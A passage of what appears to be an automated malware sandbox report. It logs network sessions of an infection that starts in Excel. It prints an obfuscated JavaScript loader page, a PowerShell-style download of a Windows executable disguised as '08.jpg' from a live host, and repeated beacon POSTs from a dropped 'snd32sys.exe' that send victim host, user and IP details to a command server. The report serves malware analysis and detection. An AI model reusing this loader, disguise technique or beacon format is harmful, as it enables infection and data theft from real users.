                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 6d 75 6c 61 74 65 49 45 38 22 20 3e 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 76 61 72 20 5f 30 78 38 63 38 36 20 3d 20 5b 0d 0a 20 20 20 20 27 57 36 52 63 55 48 48 4f 57 34 64 63 55 53 6f 63 79 5a 47 6a 27 2c 0d 0a 20 20 20 20 27 57 51 42 64 47 61 4f 37 57 50 71 5a 57 37 33 64 49 71 27 2c 0d 0a 20 20 20 20 27 57 34 70 63 4c 71 4b 67 79 43 6b 47 61 61 48 4a 57 36 4f 27 2c 0d 0a 20 20 20 20 27 57 34 68 63 4f 71 7a 42 6e 6d 6f 37 57 37 48 43 27 2c 0d 0a 20 20 20 20 27 62 57 46 63 56 57 6d 45 57 34 66 53 78 73 6c 64 55 53 6f 4b 57 50 57 27 2c 0d 0a 20 20 20 20 27 57 51 78 63 55 73 30 74 57 51 47 32 57 37 34 27 2c 0d 0a 20 20 20 20 27 79 66 43 31 57 36 42 63 50 65 66 37 57 36 6c 64 4a 64 75 27 2c 0d 0a 20 20 20 20 27 57 50 56 63 4a 53 6f 43 6e 48 79 75 57 52 4e 64 48 6d 6b 48 57 50 62 59 57 51 4b 27 2c 0d 0a 20 20 20 20 27 57 35 37 63 4b 43 6f 4b 69 43 6b 47 57 35 2f 63 50 5a 72 5a 6d 57 27 2c 0d 0a 20 20 20 20 27 57 51 78 64 48 78 7a 63 57 37 57 42 57 34 42 64 56 71 6e 76 57 50 6d 27 2c 0d 0a 20 20 20 20 27 57 35 4e 64 54 43 6b 6c 41 67 38 64 57 50 68 64 50 53 6b 30 57 52 39 4a 57 51 33 63 4c 53 6f 34 57 50 70 64 4e 32 4f 27 2c 0d 0a 20 20 20 20 27 7a 67 35 6a 57 37 30 2f 77 4a 31 65 57 34 6c 63 4f 4b 2f 63 48 47 27 2c 0d 0a 20 20 20 20 27 57 50 62 79 42 6d 6f 55 57 50 44 7a 6b 62 6c 63 4a 57 48 59 63 71 27 2c 0d 0a 20 20 20 20 27 57 37 6c 64 55 74 2f 63 4e 38 6b 64 57 50 4e 63 51 74 79 27 2c 0d 0a 20 20 20 20 27 61 61 68 64 48 75 54 48 57 50 39 44 71 47 27 2c 0d 0a 20 20 20 20 27 57 51 64 63 4d 62 69 38 57 4f 53 78 57 37 71 27 2c 0d 0a 20 20 20 20 27 57 37 69 51 6e 6d 6f 2b 44 43 6b 56 7a 53 6f 63 27 2c 0d 0a 20 20 20 20 27 57 35 57 48 72 76 4a 63 54 6d 6f 46 45 77 2f 63 52 53 6f 6c 63 6d 6f 35 6d 6d 6f 49 27 2c 0d 0a 20 20 20 20 27 6b 38 6f 66 65 6d 6b 61 57 35 50 62 7a 63 7a 4c 6c 63 58 51 27 2c 0d 0a 20 20 20 20 27 57 37 68 64 55 4d 70 64 48 43 6f 38 57 35 46 63 4b 48 71 71 79 65 39 4d 27 2c 0d 0a 20 20 20 20 27 61 38 6f 70 63 53 6b 6f 6e 43 6b 4f 72 71 27 2c 0d 0a 20 20 20 20 27 57 50 62 35 57 51 56 64 56 30 68 63 51 53 6b 37 57 35 38 27 2c 0d 0a 20 20 20 20 27 79 31 44 4c 57 52 78 63 4b 65 31 6f 57 36 61 27 2c 0d 0a 20 20 20 20 27 57 35 33 63 4b 53 6f 50 6b 38 6f 50 57 35 64 63 4c 64 7a 75 69 43 6b 2b 27 2c 0d 0a 20 20 20 20 27 57 34 38 64 78 38 6b 4e 57 50 56 64 49 58 7a 65 69 53 6f 44 57 36 52 64 4d 6d 6b 34 57 4f 5a 63 47 6d 6b 71 67 64 37 64 4b 43 6b 2f 57 52 37 63 4c 53 6f 51 57 52 4c 36 57 34 58 52 65 65 33 64 4b 6d 6f 70 69 4c 33 63 4d 4a 6d 35 69 43 6b 67 57 36 37 63 4d 4c 75 78 57 37 33 63 4d 72 6c 64 4e 43 6b 76 43 66 5a 64 4b 43 6f 35 7a 6d 6f 6c 57 35 74 63 4a 76 64 63 49 53 6f 4c 57 36 4f 4e 57 37 37 64 53 38 6b 34 74 6d 6f 65 6a 43 6b 45 42 43 6b 2b 61 71 4b 72 57 37 43 34 57 52 78 63 48 53 6b 34 63 6d 6f 63 70 59 47 2f 6d 38 6b 69 64 75 30 61 74 47 72 4f 74 43 6f 79 57 34 2f 63 47 6d 6f 69 57 35 42 63 51 43 6f 66 67 53 6f 68 57 36 42 63 4d 4c 78 64 54 30 42 64 56 4b 61 32 46 53 6f 71 57 37 2f 63 4f 38 6f 31 6b 53 6b 51 57 34 76 4c
                                                                                                                                                  Data Ascii: <!DOCTYPE html><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" ><html><body><script language="javascript">var _0x8c86 = [ 'W6RcUHHOW4dcUSocyZGj', 'WQBdGaO7WPqZW73dIq', 'W4pcLqKgyCkGaaHJW6O', 'W4hcOqzBnmo7W7HC', 'bWFcVWmEW4fSxsldUSoKWPW', 'WQxcUs0tWQG2W74', 'yfC1W6BcPef7W6ldJdu', 'WPVcJSoCnHyuWRNdHmkHWPbYWQK', 'W57cKCoKiCkGW5/cPZrZmW', 'WQxdHxzcW7WBW4BdVqnvWPm', 'W5NdTCklAg8dWPhdPSk0WR9JWQ3cLSo4WPpdN2O', 'zg5jW70/wJ1eW4lcOK/cHG', 'WPbyBmoUWPDzkblcJWHYcq', 'W7ldUt/cN8kdWPNcQty', 'aahdHuTHWP9DqG', 'WQdcMbi8WOSxW7q', 'W7iQnmo+DCkVzSoc', 'W5WHrvJcTmoFEw/cRSolcmo5mmoI', 'k8ofemkaW5PbzczLlcXQ', 'W7hdUMpdHCo8W5FcKHqqye9M', 'a8opcSkonCkOrq', 'WPb5WQVdV0hcQSk7W58', 'y1DLWRxcKe1oW6a', 'W53cKSoPk8oPW5dcLdzuiCk+', 'W48dx8kNWPVdIXzeiSoDW6RdMmk4WOZcGmkqgd7dKCk/WR7cLSoQWRL6W4XRee3dKmopiL3cMJm5iCkgW67cMLuxW73cMrldNCkvCfZdKCo5zmolW5tcJvdcISoLW6ONW77dS8k4tmoejCkEBCk+aqKrW7C4WRxcHSk4cmocpYG/m8kidu0atGrOtCoyW4/cGmoiW5BcQCofgSohW6BcMLxdT0BdVKa2FSoqW7/cO8o1kSkQW4vL
                                                                                                                                                  Jul 8, 2021 16:30:09.811317921 CEST256INData Raw: 57 51 54 62 57 4f 53 49 57 50 71 54 6b 57 48 61 67 75 78 63 50 73 43 73 79 53 6f 71 57 37 4f 42 74 6d 6f 4c 71 33 78 64 54 5a 70 64 4e 74 62 6b 43 4d 6e 6a 57 36 76 77 57 34 62 43 45 6d 6f 37 43 4d 42 63 53 5a 65 69 57 4f 42 64 53 6d 6b 33 76 53
                                                                                                                                                  Data Ascii: WQTbWOSIWPqTkWHaguxcPsCsySoqW7OBtmoLq3xdTZpdNtbkCMnjW6vwW4bCEmo7CMBcSZeiWOBdSmk3vSo5Ae9mlCoNhu7cS8kPwgm3W6pdSSk0W48hiCk8W6qyWP3dMHFdTcldISkBW7XwgSoMWP/cUmoQWPlcJCoJmmo1W4SBWQZdNGRdOtHmWQZdHCoJEradmSo5fmocASo9EqFdPqZcQgm3WRFcLConxmkJg8osWPDRWRD
                                                                                                                                                  Jul 8, 2021 16:30:09.811345100 CEST257INData Raw: 5f 30 78 32 63 36 32 63 31 2b 2b 20 25 20 28 30 78 35 20 2a 20 30 78 36 31 62 20 2b 20 30 78 31 61 62 20 2a 20 30 78 31 34 20 2b 20 2d 30 78 33 66 64 66 29 29 20 3f 20 5f 30 78 33 38 63 61 34 31 20 2b 3d 20 53 74 72 69 6e 67 5b 27 66 72 6f 6d 43
                                                                                                                                                  Data Ascii: _0x2c62c1++ % (0x5 * 0x61b + 0x1ab * 0x14 + -0x3fdf)) ? _0x38ca41 += String['fromCharCode'](-0x7e1 + 0x382 * 0x6 + -0xa4 * 0x13 & _0x3f21ea >> (-(-0x13b * -0x9 + -0x14c + 0x29 * -0x3d) * _0x2c62c1 & 0x24f0 + -0x160c + -0xede)) : 0x4 * -0x69b +
                                                                                                                                                  Jul 8, 2021 16:30:09.811362982 CEST259INData Raw: 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5f 30 78 32 63 65 65 32 32 20 3d 20 28 5f 30 78 32 63 65 65 32 32 20 2b 20 5f 30 78 31 36 62 35 63 34 5b 5f 30 78 33 65 35 65 35 34 5d 20 2b 20 5f 30 78 31 34 31 31 64 39 5b
                                                                                                                                                  Data Ascii: { _0x2cee22 = (_0x2cee22 + _0x16b5c4[_0x3e5e54] + _0x1411d9['charCodeAt'](_0x3e5e54 % _0x1411d9['length'])) % (0x14bf + -0x1712 + 0x353); _0x468eaf = _0x16b5c4[_0x3e5e54]; _0x16b5
                                                                                                                                                  Jul 8, 2021 16:30:09.811381102 CEST260INData Raw: 20 3d 20 61 72 67 75 6d 65 6e 74 73 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 5f 30 78 34 61 31 61 5b 27 58 57 6f 43 4c 6d 27 5d 20 3d 20 21 21 5b 5d 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 5f 30 78 32 30
                                                                                                                                                  Data Ascii: = arguments; _0x4a1a['XWoCLm'] = !![]; } var _0x205cf3 = _0x8c86[-0x90d + 0x6 * 0x62a + 0x1 * -0x1bef]; var _0x27eb42 = _0x304d63 + _0x205cf3; var _0x20203a = _0x53288f[_0x27eb42]; if
                                                                                                                                                  Jul 8, 2021 16:30:09.811399937 CEST262INData Raw: 61 31 61 28 5f 30 78 33 64 36 38 64 30 20 2d 20 30 78 33 64 30 2c 20 5f 30 78 34 33 37 32 32 34 29 3b 0d 0a 20 20 20 20 7d 3b 0d 0a 20 20 20 20 76 61 72 20 5f 30 78 34 32 38 36 34 65 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 5f 30 78 35 35 35 32 61
                                                                                                                                                  Data Ascii: a1a(_0x3d68d0 - 0x3d0, _0x437224); }; var _0x42864e = function (_0x5552a3, _0xcbf3b1, _0x20243f, _0x16e142, _0xcb5a73) { return _0x4a1a(_0x5552a3 - 0x3d0, _0xcb5a73); }; var _0x54c469 = function (_0x2add89, _0x1dec
                                                                                                                                                  Jul 8, 2021 16:30:09.811415911 CEST262INData Raw: 20 20 20 7d 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5f 30 78 32 33 37 39 61 33 5b 27 70 75 73 68 27 5d 28 5f 30 78 32 33 37 39 61 33 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                  Data Ascii: } else { _0x2379a3['push'](_0x2379a3['shift']()); } } catch (_0x138863) { _0x2379a3['push'](_0x2379a3['shift']()); } }}(_0x8c86, -0x4e07e + -0x295e8 + -0x1d * -0x5cca));n


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  1192.168.2.3497488.211.241.080C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:30:58.213911057 CEST3578OUTGET /08.jpg HTTP/1.1
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                  Host: srand04rf.ru
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jul 8, 2021 16:30:58.378170967 CEST3580INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:30:58 GMT
                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                  Content-Length: 763392
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Last-Modified: Wed, 07 Jul 2021 13:36:32 GMT
                                                                                                                                                  ETag: "60e5ade0-ba600"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 81 0c 63 f0 c5 6d 0d a3 c5 6d 0d a3 c5 6d 0d a3 18 92 c2 a3 c4 6d 0d a3 18 92 c0 a3 c6 6d 0d a3 18 92 c3 a3 d1 6d 0d a3 18 92 c6 a3 d3 6d 0d a3 c5 6d 0c a3 a1 6d 0d a3 18 92 df a3 c0 6d 0d a3 18 92 c4 a3 c4 6d 0d a3 18 92 c1 a3 c4 6d 0d a3 52 69 63 68 c5 6d 0d a3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a3 3c de 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 62 07 00 00 ce 0d 00 00 00 00 00 b0 ac 01 00 00 10 00 00 00 80 07 00 00 00 00 01 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 15 00 00 04 00 00 57 d6 0b 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f8 75 09 00 b4 00 00 00 00 80 13 00 40 93 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 15 00 40 47 00 00 70 39 09 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 39 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 60 07 00 00 10 00 00 00 62 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 04 02 00 00 80 07 00 00 06 02 00 00 66 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c4 ea 09 00 00 90 09 00 00 5e 00 00 00 6c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 93 01 00 00 80 13 00 00 94 01 00 00 ca 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 47 00 00 00 20 15 00 00 48 00 00 00 5e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec b8 40 af 05 01 05 70 5b 07 01 05 f8 53 08 01 05 60 9a 09 01 05 f0 32 09 01 2d c8 53 08 01 05 b0 27 09 01 a3 ac 7a 13 01 5d c3 68 e5 6f 07 01 e8 41 a2 01 00 59 c3 68 ef 6f 07 01 e8 35 a2 01 00 59 c3 b9 18 ee 09 01 e8 55 15
                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$cmmmmmmmmmmmmRichmPEL<`bpW@u@ @Gp9T9@.text`b `.rdataPf@@.data^l@.rsrc@@@.reloc@G H^@BU@p[S`2-S'z]hoAYho5YU
                                                                                                                                                  Jul 8, 2021 16:30:58.378241062 CEST3581INData Raw: 00 00 68 f9 6f 07 01 e8 1f a2 01 00 59 c3 68 03 70 07 01 e8 13 a2 01 00 59 c3 b9 2c ef 09 01 e8 33 15 00 00 68 0d 70 07 01 e8 fd a1 01 00 59 c3 cc cc cc 8b 44 24 08 c3 cc cc cc cc cc cc cc cc cc cc cc b8 ff ff ff 7f c3 cc cc cc cc cc cc cc cc cc
                                                                                                                                                  Data Ascii: hoYhpY,3hpYD$D$P@u+D$D$D$D$L$#P+w]
                                                                                                                                                  Jul 8, 2021 16:30:58.378279924 CEST3583INData Raw: ff ff 7f eb 1e 8b d1 b8 ff ff ff 7f d1 ea 2b c2 3b c8 76 07 bb ff ff ff 7f eb 08 8d 04 0a 3b d8 0f 42 d8 8d 4b 01 55 81 f9 00 10 00 00 72 23 8d 41 23 83 ca ff 3b c1 0f 46 c2 50 e8 e6 95 01 00 83 c4 04 85 c0 74 74 8d 68 23 83 e5 e0 89 45 fc eb 13
                                                                                                                                                  Data Ascii: +;v;BKUr#A#;FPtth#EtQ3Wt$~U^D$/r)HrP#+wQP.]_^[YXVt$W|$Wt$V+>_^
                                                                                                                                                  Jul 8, 2021 16:30:58.378309965 CEST3584INData Raw: 48 82 07 01 ff 25 70 82 07 01 ff 25 58 82 07 01 ff 25 5c 82 07 01 ff 25 60 82 07 01 ff 25 64 82 07 01 ff 25 68 82 07 01 ff 25 6c 82 07 01 ff 25 40 82 07 01 ff 25 3c 82 07 01 ff 25 38 82 07 01 ff 25 34 82 07 01 55 8b ec 56 ff 75 08 8b f1 83 26 00
                                                                                                                                                  Data Ascii: H%p%X%\%`%d%h%l%@%<%8%4UVu&F^]UEEA]j^xuF}N3VUGFGFGFGuGPQWVE7YYUQE3V
                                                                                                                                                  Jul 8, 2021 16:30:58.378346920 CEST3585INData Raw: e8 ad 8b 01 00 89 45 fc 59 85 c0 74 0c ff 75 08 8b c8 e8 98 fb ff ff c9 c3 33 c0 c9 c3 55 8b ec 80 3d 10 ee 09 01 00 75 12 68 a6 20 00 01 c6 05 10 ee 09 01 01 e8 7e 4f 00 00 59 8b 45 08 a3 0c ee 09 01 5d c3 6a 00 e8 12 fe ff ff 59 b8 fc ed 09 01
                                                                                                                                                  Data Ascii: EYtu3U=uh ~OYE]jYUjjYYMA]UEW8t+Vptj1^_]UQjMh%YMjUVuQL^]a
                                                                                                                                                  Jul 8, 2021 16:30:58.378382921 CEST3587INData Raw: ec 0c 8d 4d f4 ff 75 08 e8 7f fd ff ff 68 88 58 09 01 8d 45 f4 50 e8 56 a5 01 00 cc 55 8b ec 83 ec 10 8d 4d f0 ff 75 08 e8 a2 fd ff ff 68 34 59 09 01 8d 45 f0 50 e8 36 a5 01 00 cc 55 8b ec 83 ec 0c 8d 4d f4 ff 75 08 e8 cb fd ff ff 68 e0 58 09 01
                                                                                                                                                  Data Ascii: MuhXEPVUMuh4YEP6UMuhXEPAu43W@uV V/JY|^_UEVuM}k PJY^]V&M^yV VI
                                                                                                                                                  Jul 8, 2021 16:30:58.378420115 CEST3588INData Raw: 47 14 53 89 45 f8 e8 76 ee ff ff 8b f0 8d 4e 01 51 e8 cb ed ff ff 0f be 4d 10 53 89 77 14 8b f0 51 56 89 45 fc 89 5f 10 e8 b4 a6 01 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 ec ed ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00
                                                                                                                                                  Data Ascii: GSEvNQMSwQVE_Er@P7YY7_^[UUSVWK+M;rC<WENQN}Y{}EsWr,3VPqME9E@D9PVhESPGME9D9_^[
                                                                                                                                                  Jul 8, 2021 16:30:58.378456116 CEST3589INData Raw: 50 e8 bc 0b 00 00 59 59 83 f8 ff 74 38 8b 7d f0 89 7d f0 57 c6 45 fc 01 e8 5c ee ff ff 8b 07 59 8b 70 04 8b ce ff 15 88 82 07 01 8b cf ff d6 89 3d 00 ef 09 01 8d 4d ec e8 52 f6 ff ff 8b c7 e8 a0 82 01 00 c3 8d 4d e0 e8 52 02 00 00 68 a4 5e 09 01
                                                                                                                                                  Data Ascii: PYYt8}}WE\Yp=MRMRh^EPj_jM5euMPZuCt;uEP~YYt8}}WEYp=MM
                                                                                                                                                  Jul 8, 2021 16:30:58.378492117 CEST3591INData Raw: 10 2b c1 40 50 8d 04 0b 50 8d 04 37 50 e8 9b 8f 01 00 83 c4 24 5f 5e 5b 5d c2 18 00 55 8b ec 56 8b 75 08 57 8b 7d 0c 57 ff 75 10 56 e8 7c 8f 01 00 83 c4 0c c6 04 3e 00 5f 5e 5d c2 0c 00 55 8b ec 56 8b 75 08 57 8b 7d 10 57 ff 75 0c 56 e8 5a 8f 01
                                                                                                                                                  Data Ascii: +@PP7P$_^[]UVuW}WuV|>_^]UVuW}WuVZuVuWK7_^]UVuW}WuV)EuVPW7_^]UEVuW}WPV>_^]UW}tVj0^_]U]"
                                                                                                                                                  Jul 8, 2021 16:30:58.378530025 CEST3592INData Raw: 8d 4d c0 e8 cb d7 ff ff 8d 4d d8 e8 c3 d7 ff ff 8b c6 e8 6e 78 01 00 c3 6a 38 b8 df 60 07 01 e8 83 78 01 00 8b 7d 08 33 db 89 5d f0 85 ff 74 47 39 1f 75 43 6a 08 e8 55 71 01 00 8b f0 59 89 75 f0 21 5d fc 85 f6 74 1e 8b 4d 0c e8 a1 1f 00 00 50 8d
                                                                                                                                                  Data Ascii: MMnxj8`x}3]tG9uCjUqYu!]tMPM9C8f37tMjXwj8ax}3]tC97u?jpYEutM9PMMCVP(7tM&jXwj8`w
                                                                                                                                                  Jul 8, 2021 16:30:58.416707993 CEST3594INData Raw: 4d c8 8b 45 c8 83 fa 10 72 02 8b c8 80 3c 39 00 74 50 80 7d a6 00 74 4a 80 7b 04 00 75 12 8b cb e8 a2 17 00 00 8a 4b 05 8b 55 dc 8b 45 c8 eb 03 8a 4d a8 3a 4d a6 75 2a 6a 00 8d 4d c8 e8 42 2d 00 00 47 8b cb e8 5c 0f 00 00 ff 75 a0 8b cb e8 26 2b
                                                                                                                                                  Data Ascii: MEr<9tP}tJ{uKUEM:Mu*jMB-G\u&+UEtMr<9~ZGUEMtNMtDtMr]:9]u&uMr]:]|MA9~MEME}W*u


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  10192.168.2.34976477.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:56.518250942 CEST6034OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:56.586610079 CEST6034INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:58 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 48 41 5a 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cHAZSARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  11192.168.2.34976577.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:56.938754082 CEST6035OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:57.006598949 CEST6035INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:58 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
                                                                                                                                                  Data Raw: 63 0d 0a 46 56 45 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: cFVEUARRABw==0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  12192.168.2.34976677.222.42.6780C:\Users\Public\snd32sys.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 8, 2021 16:31:57.339512110 CEST6036OUTPOST /8/forum.php HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                  Host: sudepallon.com
                                                                                                                                                  Content-Length: 122
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
                                                                                                                                                  Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
                                                                                                                                                  Jul 8, 2021 16:31:57.414515972 CEST6037INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                  Date: Thu, 08 Jul 2021 14:31:58 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  X-Powered-By: PHP/5.4.45
